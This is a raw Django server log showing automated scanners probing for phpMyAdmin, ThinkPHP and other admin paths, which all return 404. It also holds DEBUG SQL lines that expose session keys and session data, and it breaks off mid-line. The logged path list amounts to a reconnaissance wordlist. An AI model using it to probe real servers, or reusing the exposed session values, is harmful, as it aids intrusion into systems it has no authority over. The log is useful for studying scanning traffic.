Found: /phpmyadmin/index.php [10/Dec/2019 18:09:50] "GET /phpmyadmin/index.php HTTP/1.0" 404 6653 Not Found: /phpMyAdmin/index.php [10/Dec/2019 18:09:50] "GET /phpMyAdmin/index.php HTTP/1.0" 404 6653 Not Found: /pmd/index.php [10/Dec/2019 18:09:50] "GET /pmd/index.php HTTP/1.0" 404 6632 Not Found: /pma/index.php [10/Dec/2019 18:09:51] "GET /pma/index.php HTTP/1.0" 404 6632 Not Found: /PMA/index.php [10/Dec/2019 18:09:51] "GET /PMA/index.php HTTP/1.0" 404 6632 Not Found: /PMA2/index.php [10/Dec/2019 18:09:51] "GET /PMA2/index.php HTTP/1.0" 404 6635 Not Found: /pmamy/index.php [10/Dec/2019 18:09:51] "GET /pmamy/index.php HTTP/1.0" 404 6638 Not Found: /pmamy2/index.php [10/Dec/2019 18:09:52] "GET /pmamy2/index.php HTTP/1.0" 404 6641 Not Found: /mysql/index.php [10/Dec/2019 18:09:52] "GET /mysql/index.php HTTP/1.0" 404 6638 Not Found: /admin/index.php [10/Dec/2019 18:09:53] "GET /admin/index.php HTTP/1.0" 404 9245 Not Found: /db/index.php [10/Dec/2019 18:09:53] "GET /db/index.php HTTP/1.0" 404 6629 Not Found: /dbadmin/index.php [10/Dec/2019 18:09:54] "GET /dbadmin/index.php HTTP/1.0" 404 6644 Not Found: /web/phpMyAdmin/index.php [10/Dec/2019 18:09:54] "GET /web/phpMyAdmin/index.php HTTP/1.0" 404 6665 Not Found: /admin/pma/index.php [10/Dec/2019 18:09:54] "GET /admin/pma/index.php HTTP/1.0" 404 9257 Not Found: /admin/PMA/index.php [10/Dec/2019 18:09:54] "GET /admin/PMA/index.php HTTP/1.0" 404 9257 Not Found: /admin/mysql/index.php [10/Dec/2019 18:09:55] "GET /admin/mysql/index.php HTTP/1.0" 404 9263 Not Found: /admin/mysql2/index.php [10/Dec/2019 18:09:55] "GET /admin/mysql2/index.php HTTP/1.0" 404 9266 Not Found: /admin/phpmyadmin/index.php [10/Dec/2019 18:09:55] "GET /admin/phpmyadmin/index.php HTTP/1.0" 404 9278 Not Found: /admin/phpMyAdmin/index.php [10/Dec/2019 18:09:56] "GET /admin/phpMyAdmin/index.php HTTP/1.0" 404 9278 Not Found: /admin/phpmyadmin2/index.php [10/Dec/2019 18:09:56] "GET /admin/phpmyadmin2/index.php HTTP/1.0" 404 9281 Not Found: /mysqladmin/index.php [10/Dec/2019 18:09:56] "GET /mysqladmin/index.php HTTP/1.0" 404 6653 Not Found: /mysql-admin/index.php [10/Dec/2019 18:09:56] "GET /mysql-admin/index.php HTTP/1.0" 404 6656 Not Found: /mysql_admin/index.php [10/Dec/2019 18:09:57] "GET /mysql_admin/index.php HTTP/1.0" 404 6656 Not Found: /phpadmin/index.php [10/Dec/2019 18:09:57] "GET /phpadmin/index.php HTTP/1.0" 404 6647 Not Found: /phpAdmin/index.php [10/Dec/2019 18:10:01] "GET /phpAdmin/index.php HTTP/1.0" 404 6647 Not Found: /phpmyadmin0/index.php [10/Dec/2019 18:10:01] "GET /phpmyadmin0/index.php HTTP/1.0" 404 6656 Not Found: /phpmyadmin1/index.php [10/Dec/2019 18:10:02] "GET /phpmyadmin1/index.php HTTP/1.0" 404 6656 Not Found: /phpmyadmin2/index.php [10/Dec/2019 18:10:02] "GET /phpmyadmin2/index.php HTTP/1.0" 404 6656 Not Found: /phpMyAdmin-4.4.0/index.php [10/Dec/2019 18:10:02] "GET /phpMyAdmin-4.4.0/index.php HTTP/1.0" 404 6671 Not Found: /phpMyAdmin4.8.0/index.php [10/Dec/2019 18:10:05] "GET /phpMyAdmin4.8.0/index.php HTTP/1.0" 404 6668 [10/Dec/2019 18:10:05] "GET / HTTP/1.0" 302 0 Not Found: /phpMyAdmin4.8.1/index.php [10/Dec/2019 18:10:06] "GET /phpMyAdmin4.8.1/index.php HTTP/1.0" 404 6668 Not Found: /phpMyAdmin4.8.2/index.php [10/Dec/2019 18:10:06] "GET /phpMyAdmin4.8.2/index.php HTTP/1.0" 404 6668 Not Found: /phpMyAdmin4.8.3/index.php [10/Dec/2019 18:10:06] "GET /phpMyAdmin4.8.3/index.php HTTP/1.0" 404 6668 Not Found: /phpMyAdmin4.8.4/index.php [10/Dec/2019 18:10:07] "GET /phpMyAdmin4.8.4/index.php HTTP/1.0" 404 6668 Not Found: /phpMyAdmin4.8.5/index.php [10/Dec/2019 18:10:07] "GET /phpMyAdmin4.8.5/index.php HTTP/1.0" 404 6668 Not Found: /myadmin2/index.php [10/Dec/2019 18:10:09] "GET /myadmin2/index.php HTTP/1.0" 404 6647 Not Found: /xampp/phpmyadmin/index.php [10/Dec/2019 18:10:09] "GET /xampp/phpmyadmin/index.php HTTP/1.0" 404 6671 Not Found: /phpMyadmin_bak/index.php [10/Dec/2019 18:10:10] "GET /phpMyadmin_bak/index.php HTTP/1.0" 404 6665 Not Found: /www/phpMyAdmin/index.php [10/Dec/2019 18:10:10] "GET /www/phpMyAdmin/index.php HTTP/1.0" 404 6665 Not Found: /tools/phpMyAdmin/index.php [10/Dec/2019 18:10:10] "GET /tools/phpMyAdmin/index.php HTTP/1.0" 404 6671 Not Found: /phpmyadmin-old/index.php [10/Dec/2019 18:10:10] "GET /phpmyadmin-old/index.php HTTP/1.0" 404 6665 Not Found: /phpMyAdminold/index.php [10/Dec/2019 18:10:11] "GET /phpMyAdminold/index.php HTTP/1.0" 404 6662 Not Found: /phpMyAdmin.old/index.php [10/Dec/2019 18:10:11] "GET /phpMyAdmin.old/index.php HTTP/1.0" 404 6665 Not Found: /pma-old/index.php [10/Dec/2019 18:10:11] "GET /pma-old/index.php HTTP/1.0" 404 6644 Not Found: /claroline/phpMyAdmin/index.php [10/Dec/2019 18:10:12] "GET /claroline/phpMyAdmin/index.php HTTP/1.0" 404 6683 Not Found: /typo3/phpmyadmin/index.php [10/Dec/2019 18:10:12] "GET /typo3/phpmyadmin/index.php HTTP/1.0" 404 6671 Not Found: /phpmyadmin/phpmyadmin/index.php [10/Dec/2019 18:10:13] "GET /phpmyadmin/phpmyadmin/index.php HTTP/1.0" 404 6686 Not Found: /phpMyAdmin/phpMyAdmin/index.php [10/Dec/2019 18:10:13] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.0" 404 6686 Not Found: /phpMyAbmin/index.php [10/Dec/2019 18:10:14] "GET /phpMyAbmin/index.php HTTP/1.0" 404 6653 Not Found: /phpMyAdmin__/index.php [10/Dec/2019 18:10:14] "GET /phpMyAdmin__/index.php HTTP/1.0" 404 6659 Not Found: /phpMyAdmin+++---/index.php [10/Dec/2019 18:10:14] "GET /phpMyAdmin+++---/index.php HTTP/1.0" 404 6671 Not Found: /v/index.php [10/Dec/2019 18:10:15] "GET /v/index.php HTTP/1.0" 404 6626 Not Found: /phpmyadm1n/index.php [10/Dec/2019 18:10:15] "GET /phpmyadm1n/index.php HTTP/1.0" 404 6653 Not Found: /phpMyAdm1n/index.php [10/Dec/2019 18:10:15] "GET /phpMyAdm1n/index.php HTTP/1.0" 404 6653 Not Found: /shaAdmin/index.php [10/Dec/2019 18:10:15] "GET /shaAdmin/index.php HTTP/1.0" 404 6647 Not Found: /phpMyadmi/index.php [10/Dec/2019 18:10:16] "GET /phpMyadmi/index.php HTTP/1.0" 404 6650 Not Found: /phpMyAdmion/index.php [10/Dec/2019 18:10:16] "GET /phpMyAdmion/index.php HTTP/1.0" 404 6656 Not Found: /s/index.php [10/Dec/2019 18:10:16] "GET /s/index.php HTTP/1.0" 404 6626 Not Found: /MyAdmin/index.php [10/Dec/2019 18:10:16] "GET /MyAdmin/index.php HTTP/1.0" 404 6644 Not Found: /phpMyAdmin1/index.php [10/Dec/2019 18:10:17] "GET /phpMyAdmin1/index.php HTTP/1.0" 404 6656 Not Found: /phpMyAdmin123/index.php [10/Dec/2019 18:10:17] "GET /phpMyAdmin123/index.php HTTP/1.0" 404 6662 Not Found: /phpMyAdmina/index.php [10/Dec/2019 18:10:21] "GET /phpMyAdmina/index.php HTTP/1.0" 404 6656 Not Found: /phpMydmin/index.php [10/Dec/2019 18:10:21] "GET /phpMydmin/index.php HTTP/1.0" 404 6650 Not Found: /phpMyAdmins/index.php [10/Dec/2019 18:10:22] "GET /phpMyAdmins/index.php HTTP/1.0" 404 6656 Not Found: /phpMyAdmin._/index.php [10/Dec/2019 18:10:22] "GET /phpMyAdmin._/index.php HTTP/1.0" 404 6659 Not Found: /phpmyadmin2222/index.php [10/Dec/2019 18:10:25] "GET /phpmyadmin2222/index.php HTTP/1.0" 404 6665 Not Found: /phpMyAdmin333/index.php [10/Dec/2019 18:10:25] "GET /phpMyAdmin333/index.php HTTP/1.0" 404 6662 Not Found: /phpmyadmin3333/index.php [10/Dec/2019 18:10:26] "GET /phpmyadmin3333/index.php HTTP/1.0" 404 6665 Not Found: /php2MyAdmin/index.php [10/Dec/2019 18:10:26] "GET /php2MyAdmin/index.php HTTP/1.0" 404 6656 Not Found: /phpiMyAdmin/index.php [10/Dec/2019 18:10:26] "GET /phpiMyAdmin/index.php HTTP/1.0" 404 6656 Not Found: /phpNyAdmin/index.php [10/Dec/2019 18:10:26] "GET /phpNyAdmin/index.php HTTP/1.0" 404 6653 Not Found: /1/index.php [10/Dec/2019 18:10:27] "GET /1/index.php HTTP/1.0" 404 6626 Not Found: /download/index.php [10/Dec/2019 18:10:27] "GET /download/index.php HTTP/1.0" 404 6647 Not Found: /phpmadmin/index.php [10/Dec/2019 18:10:29] "GET /phpmadmin/index.php HTTP/1.0" 404 6650 Not Found: /321/index.php [10/Dec/2019 18:10:29] "GET /321/index.php HTTP/1.0" 404 6632 Not Found: /123131/index.php [10/Dec/2019 18:10:30] "GET /123131/index.php HTTP/1.0" 404 6641 Not Found: /phpMyAdminn/index.php [10/Dec/2019 18:10:30] "GET /phpMyAdminn/index.php HTTP/1.0" 404 6656 Not Found: /phpMyAdminhf/index.php [10/Dec/2019 18:10:30] "GET /phpMyAdminhf/index.php HTTP/1.0" 404 6659 Not Found: /sbb/index.php [10/Dec/2019 18:10:30] "GET /sbb/index.php HTTP/1.0" 404 6632 Not Found: /WWW/phpMyAdmin/index.php [10/Dec/2019 18:10:31] "GET /WWW/phpMyAdmin/index.php HTTP/1.0" 404 6665 Not Found: /phpMyAdmln/index.php [10/Dec/2019 18:10:31] "GET /phpMyAdmln/index.php HTTP/1.0" 404 6653 Not Found: /phpMyAdmin_ai/index.php [10/Dec/2019 18:10:31] "GET /phpMyAdmin_ai/index.php HTTP/1.0" 404 6662 Not Found: /__phpMyAdmin/index.php [10/Dec/2019 18:10:32] "GET /__phpMyAdmin/index.php HTTP/1.0" 404 6659 Not Found: /program/index.php [10/Dec/2019 18:10:32] "GET /program/index.php HTTP/1.0" 404 6644 Not Found: /shopdb/index.php [10/Dec/2019 18:10:32] "GET /shopdb/index.php HTTP/1.0" 404 6641 Not Found: /phppma/index.php [10/Dec/2019 18:10:33] "GET /phppma/index.php HTTP/1.0" 404 6641 Not Found: /phpmy/index.php [10/Dec/2019 18:10:34] "GET /phpmy/index.php HTTP/1.0" 404 6638 Not Found: /mysql/admin/index.php [10/Dec/2019 18:10:34] "GET /mysql/admin/index.php HTTP/1.0" 404 6656 Not Found: /mysql/dbadmin/index.php [10/Dec/2019 18:10:34] "GET /mysql/dbadmin/index.php HTTP/1.0" 404 6662 Not Found: /mysql/sqlmanager/index.php [10/Dec/2019 18:10:34] "GET /mysql/sqlmanager/index.php HTTP/1.0" 404 6671 Not Found: /mysql/mysqlmanager/index.php [10/Dec/2019 18:10:35] "GET /mysql/mysqlmanager/index.php HTTP/1.0" 404 6677 Not Found: /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php [10/Dec/2019 18:10:35] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.0" 404 6770 Not Found: /sqladmin/index.php [10/Dec/2019 18:10:35] "GET /sqladmin/index.php HTTP/1.0" 404 6647 Not Found: /sql/index.php [10/Dec/2019 18:10:36] "GET /sql/index.php HTTP/1.0" 404 6632 Not Found: /SQL/index.php [10/Dec/2019 18:10:36] "GET /SQL/index.php HTTP/1.0" 404 6632 Not Found: /websql/index.php [10/Dec/2019 18:10:36] "GET /websql/index.php HTTP/1.0" 404 6641 Not Found: /MySQLAdmin/index.php [10/Dec/2019 18:10:36] "GET /MySQLAdmin/index.php HTTP/1.0" 404 6653 Not Found: /manager/html [10/Dec/2019 18:10:37] "GET /manager/html HTTP/1.0" 404 6629 [10/Dec/2019 18:15:08] "GET / HTTP/1.0" 302 0 [10/Dec/2019 18:15:19] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 18:15:19,212 utils 32196 139885071562496 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '3moi1ga6ml4oen8f151arhsikpx7kt3u' LIMIT 1; args=('3moi1ga6ml4oen8f151arhsikpx7kt3u',) DEBUG 2019-12-10 18:15:19,214 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('3moi1ga6ml4oen8f151arhsikpx7kt3u', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-24T18:15:19.213116+00:00'::timestamptz); args=('3moi1ga6ml4oen8f151arhsikpx7kt3u', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 18, 15, 19, 213116, tzinfo=)) [10/Dec/2019 18:15:19] "GET /login/?next=/ HTTP/1.0" 200 1786 [10/Dec/2019 18:20:11] "GET / HTTP/1.0" 302 0 [10/Dec/2019 18:25:14] "GET / HTTP/1.0" 302 0 [10/Dec/2019 18:30:17] "GET / HTTP/1.0" 302 0 [10/Dec/2019 18:35:19] "GET / HTTP/1.0" 302 0 [10/Dec/2019 18:40:22] "GET / HTTP/1.0" 302 0 [10/Dec/2019 18:45:24] "GET / HTTP/1.0" 302 0 [10/Dec/2019 18:50:27] "GET / HTTP/1.0" 302 0 [10/Dec/2019 18:58:36] "GET / HTTP/1.0" 302 0 [10/Dec/2019 19:05:03] "GET / HTTP/1.0" 302 0 [10/Dec/2019 19:10:06] "GET / HTTP/1.0" 302 0 [10/Dec/2019 19:15:08] "GET / HTTP/1.0" 302 0 [10/Dec/2019 19:20:11] "GET / HTTP/1.0" 302 0 [10/Dec/2019 19:25:14] "GET / HTTP/1.0" 302 0 [10/Dec/2019 19:30:16] "GET / HTTP/1.0" 302 0 [10/Dec/2019 19:35:19] "GET / HTTP/1.0" 302 0 [10/Dec/2019 19:40:22] "GET / HTTP/1.0" 302 0 [10/Dec/2019 19:45:25] "GET / HTTP/1.0" 302 0 [10/Dec/2019 19:47:49] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 19:47:50,205 utils 32196 139885071562496 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'xmz56hu0vei7uoq0tx6emmo11qlg2xa3' LIMIT 1; args=('xmz56hu0vei7uoq0tx6emmo11qlg2xa3',) DEBUG 2019-12-10 19:47:50,208 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('xmz56hu0vei7uoq0tx6emmo11qlg2xa3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-24T19:47:50.206531+00:00'::timestamptz); args=('xmz56hu0vei7uoq0tx6emmo11qlg2xa3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 19, 47, 50, 206531, tzinfo=)) [10/Dec/2019 19:47:50] "GET /login/?next=/ HTTP/1.0" 200 1786 [10/Dec/2019 19:50:27] "GET / HTTP/1.0" 302 0 [10/Dec/2019 19:55:30] "GET / HTTP/1.0" 302 0 [10/Dec/2019 20:05:03] "GET / HTTP/1.0" 302 0 [10/Dec/2019 20:11:16] "GET / HTTP/1.0" 302 0 [10/Dec/2019 20:16:18] "GET / HTTP/1.0" 302 0 [10/Dec/2019 20:24:01] "GET / HTTP/1.0" 302 0 [10/Dec/2019 20:33:55] "GET / HTTP/1.0" 302 0 [10/Dec/2019 20:39:19] "GET / HTTP/1.0" 302 0 [10/Dec/2019 20:44:21] "GET / HTTP/1.0" 302 0 [10/Dec/2019 20:53:11] "GET / HTTP/1.0" 302 0 [10/Dec/2019 20:58:14] "GET / HTTP/1.0" 302 0 [10/Dec/2019 21:05:03] "GET / HTTP/1.0" 302 0 [10/Dec/2019 21:10:06] "GET / HTTP/1.0" 302 0 [10/Dec/2019 21:15:46] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [10/Dec/2019 21:19:31] "GET /robots.txt HTTP/1.0" 404 6624 [10/Dec/2019 21:19:34] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 21:19:38,943 utils 32196 139885071562496 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'l51gtanbqgttupwgmpvewpdn0wjo9abn' LIMIT 1; args=('l51gtanbqgttupwgmpvewpdn0wjo9abn',) DEBUG 2019-12-10 21:19:38,944 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('l51gtanbqgttupwgmpvewpdn0wjo9abn', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-24T21:19:38.943576+00:00'::timestamptz); args=('l51gtanbqgttupwgmpvewpdn0wjo9abn', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 21, 19, 38, 943576, tzinfo=)) [10/Dec/2019 21:19:38] "GET /login/?next=/ HTTP/1.0" 200 1786 [10/Dec/2019 21:20:49] "GET / HTTP/1.0" 302 0 [10/Dec/2019 21:25:52] "GET / HTTP/1.0" 302 0 [10/Dec/2019 21:30:55] "GET / HTTP/1.0" 302 0 [10/Dec/2019 21:35:56] "GET / HTTP/1.0" 302 0 [10/Dec/2019 21:40:59] "GET / HTTP/1.0" 302 0 [10/Dec/2019 21:46:28] "GET / HTTP/1.0" 302 0 [10/Dec/2019 21:51:55] "GET / HTTP/1.0" 302 0 [10/Dec/2019 21:57:21] "GET / HTTP/1.0" 302 0 [10/Dec/2019 22:02:43] "GET / HTTP/1.0" 302 0 [10/Dec/2019 22:07:53] "GET / HTTP/1.0" 302 0 [10/Dec/2019 22:08:51] "GET / HTTP/1.0" 302 0 [10/Dec/2019 22:12:56] "GET / HTTP/1.0" 302 0 [10/Dec/2019 22:20:32] "GET / HTTP/1.0" 302 0 [10/Dec/2019 22:25:35] "GET / HTTP/1.0" 302 0 [10/Dec/2019 22:30:38] "GET / HTTP/1.0" 302 0 [10/Dec/2019 22:32:04] "GET / HTTP/1.0" 302 0 [10/Dec/2019 22:35:41] "GET / HTTP/1.0" 302 0 [10/Dec/2019 22:40:44] "GET / HTTP/1.0" 302 0 [10/Dec/2019 22:45:46] "GET / HTTP/1.0" 302 0 [10/Dec/2019 22:47:49] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 22:47:50,298 utils 32196 139885071562496 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'c1405zn1s0q5y2ez31perzxztj1q7zde' LIMIT 1; args=('c1405zn1s0q5y2ez31perzxztj1q7zde',) DEBUG 2019-12-10 22:47:50,300 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('c1405zn1s0q5y2ez31perzxztj1q7zde', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-24T22:47:50.298781+00:00'::timestamptz); args=('c1405zn1s0q5y2ez31perzxztj1q7zde', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 22, 47, 50, 298781, tzinfo=)) [10/Dec/2019 22:47:50] "GET /login/?next=/ HTTP/1.0" 200 1786 [10/Dec/2019 22:50:49] "GET / HTTP/1.0" 302 0 [10/Dec/2019 22:55:52] "GET / HTTP/1.0" 302 0 [10/Dec/2019 23:02:28] "GET / HTTP/1.0" 302 0 [10/Dec/2019 23:10:04] "GET / HTTP/1.0" 302 0 [10/Dec/2019 23:15:07] "GET / HTTP/1.0" 302 0 [10/Dec/2019 23:20:10] "GET / HTTP/1.0" 302 0 [10/Dec/2019 23:25:12] "GET / HTTP/1.0" 302 0 [10/Dec/2019 23:30:15] "GET / HTTP/1.0" 302 0 [10/Dec/2019 23:35:18] "GET / HTTP/1.0" 302 0 [10/Dec/2019 23:40:21] "GET / HTTP/1.0" 302 0 [10/Dec/2019 23:47:06] "GET / HTTP/1.0" 302 0 [10/Dec/2019 23:52:09] "GET / HTTP/1.0" 302 0 [10/Dec/2019 23:57:12] "GET / HTTP/1.0" 302 0 [10/Dec/2019 23:59:45] "GET / HTTP/1.0" 302 0 [11/Dec/2019 00:04:29] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-11 00:04:31,199 utils 32196 139885071562496 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '2cakoehhcqbi3m2fgitf6y6zeuvjvsoi' LIMIT 1; args=('2cakoehhcqbi3m2fgitf6y6zeuvjvsoi',) DEBUG 2019-12-11 00:04:31,202 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('2cakoehhcqbi3m2fgitf6y6zeuvjvsoi', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-25T00:04:31.200148+00:00'::timestamptz); args=('2cakoehhcqbi3m2fgitf6y6zeuvjvsoi', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 25, 0, 4, 31, 200148, tzinfo=)) [11/Dec/2019 00:04:31] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /proxy.php [11/Dec/2019 00:08:19] "GET /proxy.php HTTP/1.0" 404 6627 [11/Dec/2019 00:10:04] "GET / HTTP/1.0" 302 0 Not Found: /TP/public/index.php [11/Dec/2019 00:14:21] "GET /TP/public/index.php HTTP/1.0" 404 6650 Not Found: /TP/index.php [11/Dec/2019 00:14:22] "GET /TP/index.php HTTP/1.0" 404 6629 Not Found: /thinkphp/html/public/index.php [11/Dec/2019 00:14:23] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 6683 Not Found: /html/public/index.php [11/Dec/2019 00:14:24] "GET /html/public/index.php HTTP/1.0" 404 6656 Not Found: /public/index.php [11/Dec/2019 00:14:25] "GET /public/index.php HTTP/1.0" 404 6641 Not Found: /TP/html/public/index.php [11/Dec/2019 00:14:25] "GET /TP/html/public/index.php HTTP/1.0" 404 6665 Not Found: /elrekt.php [11/Dec/2019 00:14:26] "GET /elrekt.php HTTP/1.0" 404 6623 Not Found: /index.php [11/Dec/2019 00:14:27] "GET /index.php HTTP/1.0" 404 6620 [11/Dec/2019 00:14:27] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-11 00:14:29,312 utils 32196 139885071562496 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'xhcimzpekhcyv71ilwni8n209lb85ca7' LIMIT 1; args=('xhcimzpekhcyv71ilwni8n209lb85ca7',) DEBUG 2019-12-11 00:14:29,315 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('xhcimzpekhcyv71ilwni8n209lb85ca7', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-25T00:14:29.313373+00:00'::timestamptz); args=('xhcimzpekhcyv71ilwni8n209lb85ca7', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 25, 0, 14, 29, 313373, tzinfo=)) [11/Dec/2019 00:14:29] "GET /login/?next=/ HTTP/1.0" 200 1786 [11/Dec/2019 00:15:07] "GET / HTTP/1.0" 302 0 [11/Dec/2019 00:20:10] "GET / HTTP/1.0" 302 0 [11/Dec/2019 00:24:49] "GET / HTTP/1.0" 302 0 [11/Dec/2019 00:25:13] "GET / HTTP/1.0" 302 0 [11/Dec/2019 00:30:15] "GET / HTTP/1.0" 302 0 [11/Dec/2019 00:30:42] "GET / HTTP/1.0" 302 0 [11/Dec/2019 00:37:57] "GET / HTTP/1.0" 302 0 [11/Dec/2019 00:43:00] "GET / HTTP/1.0" 302 0 [11/Dec/2019 00:52:57] "GET / HTTP/1.0" 302 0 [11/Dec/2019 01:00:02] "GET / HTTP/1.0" 302 0 [11/Dec/2019 01:05:03] "GET / HTTP/1.0" 302 0 [11/Dec/2019 01:11:03] "GET / HTTP/1.0" 302 0 [11/Dec/2019 01:16:14] "GET / HTTP/1.0" 302 0 [11/Dec/2019 01:21:16] "GET / HTTP/1.0" 302 0 [11/Dec/2019 01:26:19] "GET / HTTP/1.0" 302 0 [11/Dec/2019 01:31:21] "GET / HTTP/1.0" 302 0 [11/Dec/2019 01:34:58] "GET / HTTP/1.0" 302 0 [11/Dec/2019 01:36:24] "GET / HTTP/1.0" 302 0 [11/Dec/2019 01:43:05] "GET / HTTP/1.0" 302 0 [11/Dec/2019 01:47:49] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-11 01:47:50,176 utils 32196 139885071562496 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'mow88qhkhs8fezfo6qnjpb5sbe2ew1e1' LIMIT 1; args=('mow88qhkhs8fezfo6qnjpb5sbe2ew1e1',) DEBUG 2019-12-11 01:47:50,179 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('mow88qhkhs8fezfo6qnjpb5sbe2ew1e1', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-25T01:47:50.177412+00:00'::timestamptz); args=('mow88qhkhs8fezfo6qnjpb5sbe2ew1e1', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 25, 1, 47, 50, 177412, tzinfo=)) [11/Dec/2019 01:47:50] "GET /login/?next=/ HTTP/1.0" 200 1786 [11/Dec/2019 01:49:01] "GET / HTTP/1.0" 302 0 [11/Dec/2019 01:49:55] "GET / HTTP/1.0" 302 0 [11/Dec/2019 01:54:06] "GET / HTTP/1.0" 302 0 [11/Dec/2019 01:59:09] "GET / HTTP/1.0" 302 0 [11/Dec/2019 02:05:03] "GET / HTTP/1.0" 302 0 [11/Dec/2019 02:10:44] "GET / HTTP/1.0" 302 0 [11/Dec/2019 02:15:47] "GET / HTTP/1.0" 302 0 [11/Dec/2019 02:20:50] "GET / HTTP/1.0" 302 0 [11/Dec/2019 02:29:17] "GET / HTTP/1.0" 302 0 [11/Dec/2019 02:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [11/Dec/2019 02:35:35] "GET / HTTP/1.0" 302 0 [11/Dec/2019 02:40:37] "GET / HTTP/1.0" 302 0 [11/Dec/2019 02:42:21] "GET / HTTP/1.0" 302 0 [11/Dec/2019 02:45:40] "GET / HTTP/1.0" 302 0 [11/Dec/2019 02:50:43] "GET / HTTP/1.0" 302 0 [11/Dec/2019 02:58:15] "GET / HTTP/1.0" 302 0 [11/Dec/2019 03:05:02] "GET / HTTP/1.0" 302 0 [11/Dec/2019 03:10:05] "GET / HTTP/1.0" 302 0 [11/Dec/2019 03:15:08] "GET / HTTP/1.0" 302 0 [11/Dec/2019 03:20:11] "GET / HTTP/1.0" 302 0 [11/Dec/2019 03:25:13] "GET / HTTP/1.0" 302 0 [11/Dec/2019 03:32:07] "GET / HTTP/1.0" 302 0 [11/Dec/2019 03:37:10] "GET / HTTP/1.0" 302 0 [11/Dec/2019 03:42:13] "GET / HTTP/1.0" 302 0 [11/Dec/2019 03:47:16] "GET / HTTP/1.0" 302 0 [11/Dec/2019 03:52:19] "GET / HTTP/1.0" 302 0 [11/Dec/2019 03:57:22] "GET / HTTP/1.0" 302 0 [11/Dec/2019 04:05:02] "GET / HTTP/1.0" 302 0 [11/Dec/2019 04:10:05] "GET / HTTP/1.0" 302 0 [11/Dec/2019 04:15:08] "GET / HTTP/1.0" 302 0 [11/Dec/2019 04:20:45] "GET / HTTP/1.0" 302 0 [11/Dec/2019 04:25:49] "GET / HTTP/1.0" 302 0 [11/Dec/2019 04:30:52] "GET / HTTP/1.0" 302 0 [11/Dec/2019 04:35:57] "GET / HTTP/1.0" 302 0 [11/Dec/2019 04:41:00] "GET / HTTP/1.0" 302 0 [11/Dec/2019 04:46:03] "GET / HTTP/1.0" 302 0 [11/Dec/2019 04:47:49] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-11 04:47:50,297 utils 32196 139885071562496 